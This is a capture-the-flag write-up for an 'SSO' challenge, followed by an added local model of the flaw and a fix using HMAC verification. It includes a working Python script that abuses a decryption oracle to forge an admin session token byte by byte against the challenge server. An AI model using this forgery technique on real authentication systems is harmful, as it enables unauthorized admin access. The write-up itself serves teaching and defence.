@HoLyVieR
Created December 31, 2014 17:41
Writeup SSO

The encryption was applied character by character, and the "info.php" page decrypted any token we supplied. With this in mind, we could brute-force each character individually until the decrypted output showed the character we wanted, which let us craft a token with any content of our choice. Here's an example of a decrypted token that worked:

{"User":"admin","Admin":1}

Code

import http.client

# Plaintext we want the server to see once it decrypts our crafted token.
target = '{"User":"admin","Admin":1}'
conn = http.client.HTTPConnection('188.40.18.87:5144')

def getvalue(token):
  # info.php decrypts whatever token it is given and echoes the plaintext,
  # which turns the page into a decryption oracle.
  conn.request('GET', '/info.php?token=%s' % token)
  return conn.getresponse().read().decode()

# We get this part of the token by simply using a token generated for any user:
# it decrypts to '{"User":"', so we keep those nine ciphertext bytes and only
# guess what follows.
token = "69222e97316b9dd8f7"

# One plaintext character is one ciphertext byte (two hex digits), so we extend
# the token one byte at a time, trying all 256 values until the decrypted output
# matches the next character of the target.
for j in range(len(token) // 2, len(target)):
  for i in range(256):
    h = '%02x' % i
    r = getvalue(token + h)
    if r == target[:len(r)]:
      token += h
      break

  print(token)

Then we had to visit "http://188.40.18.87:5144/admin.php?token=INSERT_TOKEN_HERE".
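To make the root cause concrete, here is an added, self-contained example (not code from the original writeup or the challenge) that models the two properties the attack above depends on, and shows the fix. A fixed random byte permutation is assumed in place of the challenge's unknown per-character cipher (the forgery does not care which mapping it is); the weak "info page" decrypts anything it is given, while the hardened one carries an HMAC over the ciphertext and verifies it, with a constant-time compare, before decrypting, so a modified token is rejected instead of being decrypted. The key and claims are constructed sample values.

```python
import hmac
import hashlib
import json
import random

# --- Weak scheme: a constructed model of the challenge's token cipher. ---
# Each plaintext byte is encrypted on its own, so ciphertext byte i depends
# only on plaintext byte i. A fixed random byte permutation (assumption; the
# real mapping is unknown and irrelevant) stands in for that cipher.
_rng = random.Random(1337)
_SBOX = list(range(256))
_rng.shuffle(_SBOX)
_INV_SBOX = [0] * 256
for _p, _c in enumerate(_SBOX):
    _INV_SBOX[_c] = _p


def weak_encrypt(plaintext: bytes) -> str:
    """Per-byte encryption; the token is the hex of the ciphertext."""
    return bytes(_SBOX[b] for b in plaintext).hex()


def weak_decrypt(token_hex: str) -> bytes:
    return bytes(_INV_SBOX[b] for b in bytes.fromhex(token_hex))


def weak_info_oracle(token_hex: str) -> bytes:
    """Models info.php: decrypts any token it is handed and shows the result."""
    return weak_decrypt(token_hex)


def forge_token(oracle, known_prefix_hex: str, target: bytes) -> str:
    """The writeup's byte-at-a-time search, run against a local oracle.

    It works only because (a) bytes are encrypted independently and (b) the
    oracle decrypts arbitrary ciphertext without any integrity check.
    """
    token = known_prefix_hex
    for _ in range(len(token) // 2, len(target)):
        for i in range(256):
            candidate = token + format(i, "02x")
            if oracle(candidate) == target[: len(candidate) // 2]:
                token = candidate
                break
        else:
            raise ValueError("no ciphertext byte decrypts to the wanted byte")
    return token


# --- Hardened scheme: authenticate the token and verify before decrypting. ---
# The same per-byte cipher is kept on purpose: the MAC alone is what stops the
# forgery, because an attacker cannot compute a valid tag for a modified
# ciphertext. (A real system should use an AEAD or a signed token format.)
def issue_token(key: bytes, claims: dict) -> str:
    ct_hex = weak_encrypt(json.dumps(claims, separators=(",", ":")).encode())
    tag = hmac.new(key, ct_hex.encode(), hashlib.sha256).hexdigest()
    return ct_hex + "." + tag


def hardened_info_oracle(key: bytes, token: str):
    """Returns the claims for a genuine token, None for anything tampered.

    Verification happens before any decryption, with a constant-time compare,
    so the page no longer decrypts attacker-chosen bytes at all.
    """
    ct_hex, sep, tag = token.partition(".")
    if not sep:
        return None
    expected = hmac.new(key, ct_hex.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return json.loads(weak_decrypt(ct_hex))


if __name__ == "__main__":
    target = b'{"User":"admin","Admin":1}'
    prefix = weak_encrypt(b'{"User":"')  # what any ordinary user's token leaks
    forged = forge_token(weak_info_oracle, prefix, target)
    print("weak scheme, forged token decrypts to:", weak_decrypt(forged))

    key = b"server-side-secret (constructed)"
    good = issue_token(key, {"User": "bob", "Admin": 0})
    print("hardened, genuine token:", hardened_info_oracle(key, good))
    # Reuse bob's tag with the forged ciphertext: rejected before decryption.
    print("hardened, forged token :",
          hardened_info_oracle(key, forged + "." + good.split(".")[1]))
```

The two oracles differ in one respect only: whether the page checks integrity before it decrypts. Against the weak oracle the search recovers a token that decrypts to the admin JSON; against the hardened one the same ciphertext, with any tag the attacker can obtain, is refused, so the per-byte malleability of the cipher can no longer be exercised.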
